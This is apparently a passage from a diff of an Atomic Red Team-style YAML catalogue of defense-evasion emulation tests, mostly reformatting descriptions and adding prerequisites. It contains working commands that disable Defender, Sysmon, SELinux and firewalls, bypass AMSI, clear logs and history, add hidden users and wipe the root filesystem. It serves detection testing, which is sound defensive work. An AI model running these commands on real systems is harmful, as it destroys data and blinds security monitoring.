Bash history (ln dev/null) description: 'Clears bash history via a symlink to /dev/null - ' +' supported_platforms: - linux - macos @@ -5962,23 +5993,23 @@ defense-evasion: name: sh command: 'ln -sf /dev/null ~/.bash_history - ' +' - name: Clear Bash history (truncate) description: 'Clears bash history via truncate - ' +' supported_platforms: - linux executor: name: sh command: 'truncate -s0 ~/.bash_history - ' +' - name: Clear history of a bunch of shells description: 'Clears the history of a bunch of different shell types by setting the history size to zero - ' +' supported_platforms: - linux - macos @@ -6078,10 +6109,10 @@ defense-evasion: command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} - ' +' cleanup_command: 'del #{output_file} >nul 2>&1 - ' +' T1223: technique: x_mitre_data_sources: @@ -6169,7 +6200,7 @@ defense-evasion: elevation_required: false command: 'hh.exe #{local_chm_file} - ' +' - name: Compiled HTML Help Remote Payload description: | Uses hh.exe to execute a remote compiled HTML Help payload. @@ -6186,7 +6217,7 @@ defense-evasion: elevation_required: false command: 'hh.exe #{remote_chm_file} - ' +' T1090: technique: x_mitre_data_sources: @@ -6264,7 +6295,7 @@ defense-evasion: name: sh command: 'export #{proxy_scheme}_proxy=#{proxy_server} - ' +' cleanup_command: | unset http_proxy unset https_proxy @@ -6394,7 +6425,7 @@ defense-evasion: elevation_required: false command: 'control.exe #{cpl_file_path} - ' +' T1207: technique: x_mitre_data_sources: @@ -6652,7 +6683,7 @@ defense-evasion: updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded - ' +' supported_platforms: - windows input_arguments: @@ -6750,7 +6781,7 @@ defense-evasion: description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) - ' +' supported_platforms: - windows input_arguments: @@ -6821,7 +6852,7 @@ defense-evasion: - name: Disable iptables firewall description: 'Disables the iptables firewall - ' +' supported_platforms: - linux executor: @@ -6840,7 +6871,7 @@ defense-evasion: - name: Disable syslog description: 'Disables syslog collection - ' +' supported_platforms: - linux executor: @@ -6857,7 +6888,7 @@ defense-evasion: - name: Disable Cb Response description: 'Disable the Cb Response service - ' +' supported_platforms: - linux executor: @@ -6874,52 +6905,51 @@ defense-evasion: - name: Disable SELinux description: 'Disables SELinux enforcement - ' +' supported_platforms: - linux executor: name: sh command: 'setenforce 0 - ' +' - name: Disable Carbon Black Response description: 'Disables Carbon Black Response - ' +' supported_platforms: - macos executor: name: sh command: 'sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist - ' +' - name: Disable LittleSnitch description: 'Disables LittleSnitch - ' +' supported_platforms: - macos executor: name: sh command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist - ' +' - name: Disable OpenDNS Umbrella description: 'Disables OpenDNS Umbrella - ' +' supported_platforms: - macos executor: name: sh command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist - ' +' - name: Unload Sysmon Filter Driver - description: 'Unloads the Sysinternals Sysmon filter driver without stopping - the Sysmon service. - - ' + description: | + Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, + run the prereq_command's and it should fail with an error of "sysmon filter must be loaded". supported_platforms: - windows input_arguments: @@ -6928,24 +6958,42 @@ defense-evasion: the default) type: string default: SysmonDrv + dependency_executor_name: powershell dependencies: - - description: Sysmon filter must be loaded - prereq_command: 'fltmc.exe filters | findstr #{sysmon_driver}' - get_prereq_command: echo Automated installer not implemented yet, please install - Sysmon manually + - description: Sysmon must be downloaded + prereq_command: if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon + 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { + exit 1 } + get_prereq_command: |- + Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" + Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force + Remove-Item $env:TEMP\Sysmon.zip -Force + - description: sysmon must be Installed + prereq_command: if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { + exit 1 } + get_prereq_command: |- + if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else + { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} + - description: sysmon filter must be loaded + prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 + } else { exit 1 }' + get_prereq_command: |- + sysmon -u + sysmon -accepteula -i executor: name: command_prompt elevation_required: true prereq_command: 'fltmc.exe filters | findstr #{sysmon_driver} - ' +' command: 'fltmc.exe unload #{sysmon_driver} - ' +' cleanup_command: | - sc stop sysmon - fltmc.exe load #{sysmon_driver} - sc start sysmon + sysmon -u -i > nul 2>&1 + sysmon -i -accepteula -i > nul 2>&1 + %temp%\Sysmon\sysmon.exe -u > nul 2>&1 + %temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1 - name: Disable Windows IIS HTTP Logging description: | Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). @@ -6962,19 +7010,19 @@ defense-evasion: prereq_command: 'if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {exit 0} else {exit 1} - ' +' command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true - ' +' cleanup_command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false - ' +' - name: Uninstall Sysmon description: 'Uninstall Sysinternals Sysmon for Defense Evasion - ' +' supported_platforms: - windows input_arguments: @@ -7001,10 +7049,10 @@ defense-evasion: elevation_required: true command: 'sysmon -u - ' +' cleanup_command: 'sysmon -i -accepteula - ' +' - name: AMSI Bypass - AMSI InitFailed description: | Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. @@ -7028,16 +7076,16 @@ defense-evasion: command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse - ' +' cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" - ' +' - name: Disable Arbitrary Security Windows Service description: 'With administrative rights, an adversary can disable Windows Services related to security products. - ' +' supported_platforms: - windows input_arguments: @@ -7086,12 +7134,11 @@ defense-evasion: elevation_required: false command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true) - ' +' - name: Tamper with Windows Defender ATP PowerShell - description: 'Attempting to disable scheduled scanning and other parts of windows - defender atp - - ' + description: | + Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled + in Windows settings. supported_platforms: - windows executor: @@ -7108,10 +7155,9 @@ defense-evasion: Set-MpPreference -DisableScriptScanning 0 Set-MpPreference -DisableBlockAtFirstSeen 0 - name: Tamper with Windows Defender Command Prompt - description: 'Attempting to disable scheduled scanning and other parts of windows - defender atp - - ' + description: | + Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. + However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. supported_platforms: - windows executor: @@ -7125,9 +7171,9 @@ defense-evasion: sc start WinDefend sc config WinDefend start=enabled - name: Tamper with Windows Defender Registry - description: 'Disable Windows Defender from starting after a reboot - - ' + description: | + Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be + grayed out and have no info. supported_platforms: - windows executor: @@ -7136,14 +7182,17 @@ defense-evasion: command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 - ' +' cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 - ' +' - name: Disable Microft Office Security Features description: | - Gorgon group may disable Office security features so that their code can run + Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not + show any warning before editing the document + + https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ supported_platforms: - windows @@ -7163,8 +7212,10 @@ defense-evasion: Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" - name: Remove Windows Defender Definition Files description: | - Removing definition files would cause ATP to not fire for AntiMalware - Check MpCmdRun.exe man page for info on all arguments + Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. + On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the + command will say completed. + https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ supported_platforms: - windows @@ -7174,7 +7225,7 @@ defense-evasion: command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All - ' +' T1107: technique: x_mitre_data_sources: @@ -7230,7 +7281,7 @@ defense-evasion: - name: Delete a single file - Linux/macOS description: 'Delete a single file from the temporary directory - ' +' supported_platforms: - linux - macos @@ -7243,12 +7294,12 @@ defense-evasion: name: sh command: 'rm -f #{file_to_delete} - ' +' - name: Delete an entire folder - Linux/macOS description: 'Recursively delete the temporary directory and all files contained within it - ' +' supported_platforms: - linux - macos @@ -7261,12 +7312,12 @@ defense-evasion: name: sh command: 'rm -rf #{folder_to_delete} - ' +' - name: Overwrite and delete a file with shred description: 'Use the `shred` command to overwrite the temporary file and then delete it - ' +' supported_platforms: - linux input_arguments: @@ -7278,123 +7329,122 @@ defense-evasion: name: sh command: 'shred -u #{file_to_shred} - ' +' - name: Delete a single file - Windows cmd - description: 'Delete a single file from the temporary directory using cmd.exe - - ' + description: | + Delete a single file from the temporary directory using cmd.exe. + Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. supported_platforms: - windows + input_arguments: + file_to_delete: + description: File to delete. Run the prereq command to create it if it does + not exist. + type: string + default: "%temp%\\deleteme_T1107" + dependency_executor_name: command_prompt + dependencies: + - description: The file to delete must exist on disk at specified location (#{file_to_delete}) + prereq_command: IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) + get_prereq_command: 'echo deleteme_T1107 >> #{file_to_delete}' executor: name: command_prompt elevation_required: false - command: | - echo "T1107" > %temp%\T1107.txt - del /f %temp%\T1107.txt >nul 2>&1 + command: 'del /f #{file_to_delete} + +' - name: Delete an entire folder - Windows cmd - description: 'Recursively delete the temporary directory and all files contained - within it using cmd.exe - - ' + description: | + Recursively delete a folder in the temporary directory using cmd.exe. + Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. supported_platforms: - windows + input_arguments: + folder_to_delete: + description: Folder to delete. Run the prereq command to create it if it + does not exist. + type: string + default: "%temp%\\deleteme_T1107" + dependency_executor_name: command_prompt + dependencies: + - description: The file to delete must exist on disk at specified location (#{folder_to_delete}) + prereq_command: IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) + get_prereq_command: 'mkdir #{folder_to_delete}' executor: name: command_prompt elevation_required: false - command: | - mkdir %temp%\T1107 - rmdir /s /q %temp%\T1107 + command: 'rmdir /s /q #{folder_to_delete} + +' - name: Delete a single file - Windows PowerShell - description: 'Delete a single file from the temporary directory using Powershell + description: 'Delete a single file from the temporary directory using Powershell. + Upon execution, no output will be displayed. Use File Explorer to verify the + file was deleted. - ' +' supported_platforms: - windows + input_arguments: + file_to_delete: + description: File to delete. Run the prereq command to create it if it does + not exist. + type: string + default: "$env:TEMP\\deleteme_T1107" + dependency_executor_name: powershell + dependencies: + - description: The file to delete must exist on disk at specified location (#{file_to_delete}) + prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}' + get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null' executor: name: powershell elevation_required: false - command: | - New-Item $env:TEMP\T1107.txt - Remove-Item -path $env:TEMP\T1107.txt + command: 'Remove-Item -path #{file_to_delete} + +' - name: Delete an entire folder - Windows PowerShell - description: 'Recursively delete the temporary directory and all files contained - within it using Powershell + description: 'Recursively delete a folder in the temporary directory using Powershell. + Upon execution, no output will be displayed. Use File Explorer to verify the + folder was deleted. - ' +' supported_platforms: - windows + input_arguments: + folder_to_delete: + description: Folder to delete. Run the prereq command to create it if it + does not exist. + type: string + default: "$env:TEMP\\deleteme_folder_T1107" + dependency_executor_name: powershell + dependencies: + - description: The folder to delete must exist on disk at specified location + (#{folder_to_delete}) + prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}' + get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory | + Out-Null' executor: name: powershell elevation_required: false - command: | - New-Item $env:TEMP\T1107 -ItemType Directory - Remove-Item -path $env:TEMP\T1107 -recurse - - name: Delete VSS - vssadmin - description: 'Delete all volume shadow copies with vssadmin.exe + command: 'Remove-Item -Path #{folder_to_delete} -Recurse - ' - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: 'vssadmin.exe Delete Shadows /All /Quiet - - ' - - name: Delete VSS - wmic - description: 'Delete all volume shadow copies with wmic - - ' - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: 'wmic shadowcopy delete - - ' - - name: bcdedit - description: 'This test leverages `bcdedit` to remove boot-time recovery measures. - - ' - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: | - bcdedit /set {default} bootstatuspolicy ignoreallfailures - bcdedit /set {default} recoveryenabled no - - name: wbadmin - description: 'This test deletes Windows Backup catalogs. - - ' - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: 'wbadmin delete catalog -quiet - - ' +' - name: Delete Filesystem - Linux description: 'This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. - ' +' supported_platforms: - linux executor: name: bash command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null - ' +' - name: Delete-PrefetchFile - description: 'Delete a single prefetch file. Deletion of prefetch files is - a known anti-forensic technique. - - ' + description: | + Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count" + before and after the test to verify that the number of prefetch files decreases by 1. supported_platforms: - windows executor: @@ -7403,27 +7453,35 @@ defense-evasion: command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) - ' +' - name: Delete TeamViewer Log Files description: | Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration. This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer - log file format of TeamViewerXX_Logfile.log + log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. + https://twitter.com/SBousseaden/status/1197524463304290305?s=20 supported_platforms: - windows - - macos + input_arguments: + teamviewer_log_file: + description: Teamviewer log file to delete. Run the prereq command to create + it if it does not exist. + type: string + default: "$env:TEMP\\TeamViewer_54.log" + dependency_executor_name: powershell + dependencies: + - description: The folder to delete must exist on disk at specified location + (#{teamviewer_log_file}) + prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit + 1}' + get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null' executor: name: powershell elevation_required: false - command: | - if ($env:os -eq "Windows_NT") { - New-Item $env:TEMP\TeamViewer_54.log - Remove-Item $env:TEMP\TeamViewer_54.log - } else { - New-Item $env:HOME\TeamViewer_54.log - Remove-Item $env:HOME\TeamViewer_54.log - } + command: 'Remove-Item #{teamviewer_log_file} + +' T1222: technique: x_mitre_data_sources: @@ -7522,7 +7580,7 @@ defense-evasion: description: 'Modifies the filesystem permissions of the specified file or folder to take ownership of the object. - ' +' supported_platforms: - windows input_arguments: @@ -7534,12 +7592,12 @@ defense-evasion: name: command_prompt command: 'takeown.exe /f #{file_folder_to_own} - ' +' - name: Take ownership recursively using takeown utility description: 'Modifies the filesystem permissions of the specified folder to take ownership of it and its contents. - ' +' supported_platforms: - windows input_arguments: @@ -7551,12 +7609,12 @@ defense-evasion: name: command_prompt command: 'takeown.exe /f #{folder_to_own} /r - ' +' - name: cacls - Grant permission to specified user or group description: 'Modifies the filesystem permissions of the specified file or folder to allow the specified user or group Full Control. - ' +' supported_platforms: - windows input_arguments: @@ -7572,12 +7630,12 @@ defense-evasion: name: command_prompt command: 'cacls.exe #{file_or_folder} /grant #{user_or_group}:F - ' +' - name: cacls - Grant permission to specified user or group recursively description: 'Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. - ' +' supported_platforms: - windows input_arguments: @@ -7593,12 +7651,12 @@ defense-evasion: name: command_prompt command: 'cacls.exe #{file_or_folder} /grant #{user_or_group}:F /t - ' +' - name: icacls - Grant permission to specified user or group description: 'Modifies the filesystem permissions of the specified file or folder to allow the specified user or group Full Control. - ' +' supported_platforms: - windows input_arguments: @@ -7614,12 +7672,12 @@ defense-evasion: name: command_prompt command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F - ' +' - name: icacls - Grant permission to specified user or group recursively description: 'Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. - ' +' supported_platforms: - windows input_arguments: @@ -7635,12 +7693,12 @@ defense-evasion: name: command_prompt command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F /t - ' +' - name: attrib - Remove read-only attribute description: 'Removes the read-only attribute from a file or folder using the attrib.exe command. - ' +' supported_platforms: - windows input_arguments: @@ -7652,12 +7710,12 @@ defense-evasion: name: command_prompt command: 'attrib.exe -r #{file_or_folder} - ' +' - name: chmod - Change file or folder mode (numeric mode) description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux @@ -7674,12 +7732,12 @@ defense-evasion: name: bash command: 'chmod #{numeric_mode} #{file_or_folder} - ' +' - name: chmod - Change file or folder mode (symbolic mode) description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux @@ -7696,12 +7754,12 @@ defense-evasion: name: bash command: 'chmod #{symbolic_mode} #{file_or_folder} - ' +' - name: chmod - Change file or folder mode (numeric mode) recursively description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux @@ -7718,12 +7776,12 @@ defense-evasion: name: bash command: 'chmod #{numeric_mode} #{file_or_folder} -R - ' +' - name: chmod - Change file or folder mode (symbolic mode) recursively description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux @@ -7740,12 +7798,12 @@ defense-evasion: name: bash command: 'chmod #{symbolic_mode} #{file_or_folder} -R - ' +' - name: chown - Change file or folder ownership and group description: 'Changes a file or folder''s ownership and group information using chown. - ' +' supported_platforms: - macos - linux @@ -7766,12 +7824,12 @@ defense-evasion: name: bash command: 'chown #{owner}:#{group} #{file_or_folder} - ' +' - name: chown - Change file or folder ownership and group recursively description: 'Changes a file or folder''s ownership and group information recursively using chown. - ' +' supported_platforms: - macos - linux @@ -7792,11 +7850,11 @@ defense-evasion: name: bash command: 'chown #{owner}:#{group} #{file_or_folder} -R - ' +' - name: chown - Change file or folder mode ownership only description: 'Changes a file or folder''s ownership only using chown. - ' +' supported_platforms: - macos - linux @@ -7813,11 +7871,11 @@ defense-evasion: name: bash command: 'chown #{owner} #{file_or_folder} - ' +' - name: chown - Change file or folder ownership recursively description: 'Changes a file or folder''s ownership only recursively using chown. - ' +' supported_platforms: - macos - linux @@ -7834,7 +7892,7 @@ defense-evasion: name: bash command: 'chown #{owner} #{file_or_folder} -R - ' +' - name: chattr - Remove immutable file attribute description: | Remove's a file's `immutable` attribute using `chattr`. @@ -7851,7 +7909,7 @@ defense-evasion: name: sh command: 'chattr -i #{file_to_modify} - ' +' T1144: technique: x_mitre_permissions_required: @@ -7930,7 +7988,7 @@ defense-evasion: - name: Gatekeeper Bypass description: 'Gatekeeper Bypass via command line - ' +' supported_platforms: - macos input_arguments: @@ -7994,7 +8052,7 @@ defense-evasion: - name: Disable history collection description: 'Disables history collection in shells - ' +' supported_platforms: - linux - macos @@ -8089,7 +8147,7 @@ defense-evasion: - name: Create a hidden file in a hidden directory description: 'Creates a hidden file inside a hidden directory - ' +' supported_platforms: - linux - macos @@ -8101,11 +8159,11 @@ defense-evasion: echo "T1158" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ - ' +' - name: Mac Hidden file description: 'Hide a file on MacOS - ' +' supported_platforms: - macos executor: @@ -8114,42 +8172,61 @@ defense-evasion: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" - ' +' - name: Create Windows System File with Attrib - description: 'Creates a file and marks it as a system file using the attrib.exe - utility. - - ' + description: | + Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details + and observe that the Attributes are "SA" for System and Archive. supported_platforms: - windows + input_arguments: + file_to_modify: + description: File to modify using Attrib command + type: string + default: "%temp%\\T1158.txt" + dependency_executor_name: command_prompt + dependencies: + - description: The file must exist on disk at specified location (#{file_to_modify}) + prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )' + get_prereq_command: 'echo system_Attrib_T1158 >> #{file_to_modify}' executor: name: command_prompt elevation_required: true - command: | - echo T1158 > %TEMP%\T1158.txt - attrib.exe +s %TEMP%\T1158.txt - cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1 + command: 'attrib.exe +s #{file_to_modify} - ' +' + cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1 + +' - name: Create Windows Hidden File with Attrib - description: 'Creates a file and marks it as hidden using the attrib.exe utility. - - ' + description: | + Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file + and observe that the Attributes are "SH" for System and Hidden. supported_platforms: - windows + input_arguments: + file_to_modify: + description: File to modify using Attrib command + type: string + default: "%temp%\\T1158.txt" + dependency_executor_name: command_prompt + dependencies: + - description: The file must exist on disk at specified location (#{file_to_modify}) + prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )' + get_prereq_command: 'echo system_Attrib_T1158 >> #{file_to_modify}' executor: name: command_prompt - elevation_required: false - command: | - echo T1158_hidden > %TEMP%\T1158_hidden.txt - attrib.exe +h %TEMP%\T1158_hidden.txt - cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1 + elevation_required: true + command: 'attrib.exe +h #{file_to_modify} - ' +' + cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1 + +' - name: Hidden files description: 'Requires Apple Dev Tools - ' +' supported_platforms: - macos input_arguments: @@ -8162,11 +8239,11 @@ defense-evasion: elevation_required: false command: 'setfile -a V #{filename} - ' +' - name: Hide a Directory description: 'Hide a directory on MacOS - ' +' supported_platforms: - macos executor: @@ -8177,11 +8254,11 @@ defense-evasion: chflags hidden /var/tmp/T1158_mac.txt cleanup_command: 'rm /var/tmp/T1158_mac.txt - ' +' - name: Show all hidden files description: 'Show all hidden files on MacOS - ' +' supported_platforms: - macos executor: @@ -8189,52 +8266,59 @@ defense-evasion: elevation_required: false command: 'defaults write com.apple.finder AppleShowAllFiles YES - ' +' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO - ' +' - name: Create ADS command prompt - description: 'Create an Alternate Data Stream with the command prompt. Write - access is required. - - ' + description: | + Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp% + folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1158_has_ads.txt:adstest.txt" supported_platforms: - windows input_arguments: file_name: description: File name of file to create ADS on. type: string - default: test.txt + default: "%temp%\\T1158_has_ads_cmd.txt" ads_filename: description: Name of ADS file. type: string default: adstest.txt + dependency_executor_name: command_prompt + dependencies: + - description: The file must exist on disk at specified location (#{file_name}) + prereq_command: 'IF EXIST #{file_name} ( EXIT 0 ) ELSE ( EXIT 1 )' + get_prereq_command: 'echo normal_text >> #{file_name} >nul 2>&1' executor: name: command_prompt elevation_required: false command: | - echo "Normal Text." > #{file_name} echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename} - for /f "usebackq delims=╧å" %i in (#{file_name}:#{ads_filename}) do %i + for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 - ' +' - name: Create ADS PowerShell - description: 'Create an Alternate Data Stream with PowerShell. Write access - is required. - - ' + description: | + Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname" + in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1158_has_ads_powershell.txt:adstest.txt" in the %temp% folder. supported_platforms: - windows input_arguments: file_name: description: File name of file to create ADS on. type: string - default: test.txt + default: "$env:TEMP\\T1158_has_ads_powershell.txt" ads_filename: description: Name of ADS file. type: string default: adstest.txt + dependency_executor_name: powershell + dependencies: + - description: The file must exist on disk at specified location (#{file_name}) + prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 }' + get_prereq_command: 'New-Item -Path #{file_name} | Out-Null' executor: name: powershell elevation_required: false @@ -8242,10 +8326,9 @@ defense-evasion: echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" set-content -path #{file_name} -stream #{ads_filename} -value "test2" set-content -path . -stream #{ads_filename} -value "test3" - ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore - ' +' T1147: technique: x_mitre_data_sources: @@ -8293,7 +8376,7 @@ defense-evasion: - name: Hidden Users description: 'Add a hidden user on MacOS - ' +' supported_platforms: - macos input_arguments: @@ -8305,7 +8388,7 @@ defense-evasion: name: sh command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333 - ' +' T1143: technique: x_mitre_permissions_required: @@ -8377,7 +8460,7 @@ defense-evasion: elevation_required: false command: 'Start-Process #{powershell_command} - ' +' T1183: technique: x_mitre_data_sources: @@ -8467,7 +8550,7 @@ defense-evasion: - name: IFEO Add Debugger description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -8485,15 +8568,15 @@ defense-evasion: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f - ' +' - name: IFEO Global Flags description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -8597,7 +8680,7 @@ defense-evasion: - name: Clear Logs description: 'Upon execution this test will clear Windows Event Logs - ' +' supported_platforms: - windows input_arguments: @@ -8610,12 +8693,12 @@ defense-evasion: elevation_required: true command: 'wevtutil cl #{log_name} - ' +' - name: FSUtil description: 'Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. - ' +' supported_platforms: - windows executor: @@ -8623,11 +8706,11 @@ defense-evasion: elevation_required: true command: 'fsutil usn deletejournal /D C: - ' +' - name: rm -rf description: 'Delete system and audit logs - ' +' supported_platforms: - macos - linux @@ -8641,7 +8724,7 @@ defense-evasion: This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -8653,12 +8736,12 @@ defense-evasion: name: bash command: 'echo 0> /var/spool/mail/#{username} - ' +' - name: Overwrite Linux Log description: 'This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -8670,12 +8753,12 @@ defense-evasion: name: bash command: 'echo 0> #{log_path} - ' +' - name: Delete System Logs Using PowerShell description: 'Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments - ' +' supported_platforms: - windows executor: @@ -8687,11 +8770,11 @@ defense-evasion: Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx cleanup_command: 'Start-Service -Name EventLog - ' +' - name: Delete System Logs Using Clear-EventLogId description: 'Clear event logs using built-in PowerShell commands - ' +' supported_platforms: - windows executor: @@ -8699,7 +8782,7 @@ defense-evasion: elevation_required: true command: 'Clear-EventLog -logname Application - ' +' T1202: technique: x_mitre_data_sources: @@ -8891,7 +8974,7 @@ defense-evasion: - name: Install root CA on CentOS/RHEL description: 'Creates a root CA with openssl - ' +' supported_platforms: - linux input_arguments: @@ -8973,7 +9056,7 @@ defense-evasion: description: 'Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. - ' +' supported_platforms: - windows input_arguments: @@ -9039,7 +9122,7 @@ defense-evasion: description: 'Executes the InstallHelper class constructor runner instead of executing InstallUtil. - ' +' supported_platforms: - windows input_arguments: @@ -9106,7 +9189,7 @@ defense-evasion: - name: InstallUtil class constructor method call description: 'Executes the installer assembly class constructor. - ' +' supported_platforms: - windows input_arguments: @@ -9173,7 +9256,7 @@ defense-evasion: - name: InstallUtil Install method call description: 'Executes the Install Method - ' +' supported_platforms: - windows input_arguments: @@ -9240,7 +9323,7 @@ defense-evasion: - name: InstallUtil Uninstall method call - 